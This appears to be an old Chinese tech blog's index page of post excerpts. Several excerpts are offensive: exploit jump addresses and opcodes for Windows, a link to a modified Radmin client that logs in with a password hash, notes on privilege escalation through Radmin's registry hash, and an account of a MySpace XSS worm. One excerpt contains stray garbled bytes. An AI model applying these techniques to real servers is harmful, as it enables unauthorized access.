一些opcodes
by axis
2007-03-28
近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
简体中文windows的通用跳转地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..................
阅读全文
摘要: 更新:上次比较匆忙,有个函数没改好,今天才可以上网,现在没问题了
前段时间出了个radmin的算是技巧吧(http://www.blogjava.net/baicker/archive/2007/09/12/144609.html),以前也有过这个想法,只是没有去研究,这次索性修改了下源文件,直接改成利用hash登录的版本,省得每次带个od跑,针对屏幕相关的似乎不行,不过已经够用了呵呵
注:hash用小写字母(懒得改了)
http://www.blogjava.net/Files/baicker/Radmin_Hash.rar
阅读全文
摘要: Please note that this code and explanation was only released AFTER MySpace resolved this.
None of this would work on MySpace at the time it was released and it will not work now. Otherwise, there would have been mayhem.
Now, let's talk more about the problems encountered, workarounds, and how it worked in general.
1) Myspace blocks a lot of tags. In fact, they only seem to allow <a>, <img>s, and <div>s...maybe a few others (<embed>'s, I think). They would 阅读全文
摘要: "←"为ESC代码 ^YzFE�u $
在用EDIT编辑批处理文件时可用下列方法输入ESC字符.首先同时按下Ctrl和P键 \�?)@� #Qs
然后再按下作方括号,此时屏幕出现一左箭头,说明已输入了ESC字符.之后必须放 �Jq)�!)={
开Ctrl再次按下方括号键开始ANSI命令.
ESC[Ps;...;Psm
设置图形模式:调用由下列数值指定的图形函数,在该序列再次出现之前,这些被指定的函数保持激活状态。图形模式改变屏幕上显示的颜色和文本(例如:黑体和下划线字体)属性。
文本属性
值功能
------------------------------------
0 无属性
1 黑体
4 下划线字体(仅适用于单色显示适配器)
5 闪烁字体
..........
阅读全文
摘要: alsasound Alsa 声卡驱动程序支持。Alsa声卡驱动程序本来是为了一种声卡Gravis UltraSound(GUS)而写的,它和OSS/Free 及OSS/Linux兼容。
apmd 用来监视系统用电状态,并将相关信息通过syslogd 写入日志,也可以用来在电源不足时关机。一般用于笔记本电脑,若是台式机建议关闭。
atd 用At命令调度的任务,也在系统负荷比较低时运行批处理任务。
autofs 需要时自动转载文件系统,不需要时自动卸载。
chargen 端口chargen字符产生的缩写,输出一个可打印字符的旋转序列,用于测试字符终端设备。
chargen udp udp格式下端口chargen字符产生的缩写,输出一个可打印字符的旋转序列,用于测试字符终端设备。
crond 根据用户要求周期地运行调度的任务。它比较安全,配置简单,类似Windows中的计划任务。
dhcpd 提供了对动态主机控制协议(Dynamic Host Control Pro 阅读全文
摘要: cp_syn_retries :INTEGER
默认值是5
对于一个新建连接,内核要发送多少个 SYN 连接请求才决定放弃。不应该大于255,默认值是5,对应于180秒左右时间。(对于大负载而物理通信良好的网络而言,这个值偏高,可修改为2.这个值仅仅是针对对外的连接,对进来的连接,是由tcp_retries1 决定的)
tcp_synack_retries :INTEGER
默认值是5
对于远端的连接请求SYN,内核会发送SYN + ACK数据报,以确认收到上一个 SYN连接请求包。这是所谓的三次握手( threeway handshake)机制的第二个步骤。这里决定内核在放弃连接之前所送出的 SYN+ACK 数目。不应该大于255,默认值是5,对应于180秒左右时间。(可以根据上面的 tcp_syn_retries 来决定这个值)
tcp_keepalive_time :INTEGER
默认值是7200(2小时)
当keepalive打开的情况下,TCP发送keepalive消息的频率。(由于目前网络 阅读全文
摘要: Radmin 是一款很不错的服务器管理
无论是 远程桌面控制 还是 文件传输
速度都很快 很方便
这样也形成了 很多服务器都装了 radmin这样的
现在你说 4899默认端口 没密码的 服务器你上哪找?
大家都知道radmin的密码都是32位md5加密后
存放在注册表里的
具体的表键值为 HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\
那在攻陷一台web服务器时 大家 怎么能进一步提权?
如果你说 暴力破解 radmin 密码 呵呵 那也行
只不过 你要有足够的时间 跟精力
我想很少人 花上几星期 几月 甚至几年 去破解那个密码
............
阅读全文
摘要:
1、接电话时对着话筒说:你好,主人不在家,这里是电话录音,当你听到biu~~的一声时,请留言。biu~~(打入者楞住了)biu~~biu~~(……)biu~~靠!我都biu~~了怎么还不留啊!
2、接电话时说:对不起,您拨打的电话已关机或已离开服务区。
3、索性一接电话就发出嘟嘟嘟的声音。
4、接电话时对着话筒发出贞子般的呼气声。
5、接女生电话时说:王老五!拜托!装个娘娘腔我就听不出了吗?不要再骚扰我了,我正泡妞呢,再打过来小心我报警,告你打色情电话!
.............
阅读全文
摘要: 很多时候程序的 Debug 版本运行没有任何问题,但是一旦发布 Release 版本后,运行就出错,着实让人郁闷。大家知道,VC++ 中 Release 版本是对无法对源代码进行调试的。一般的做法是在怀疑有错误的代码前后插入MessageBox 函数,在函数中显示可能导致错误的变量的值。或者插入写文件的语句,输出可能导致错误的变量的值到一个记录文件。其实,除了上面讲的这个办法之外,还有其它的途径来调试 Release 版本的。下面就结合自己的经验和网上查找的一些资料给出调试 Release 版本的两个方法:
......
阅读全文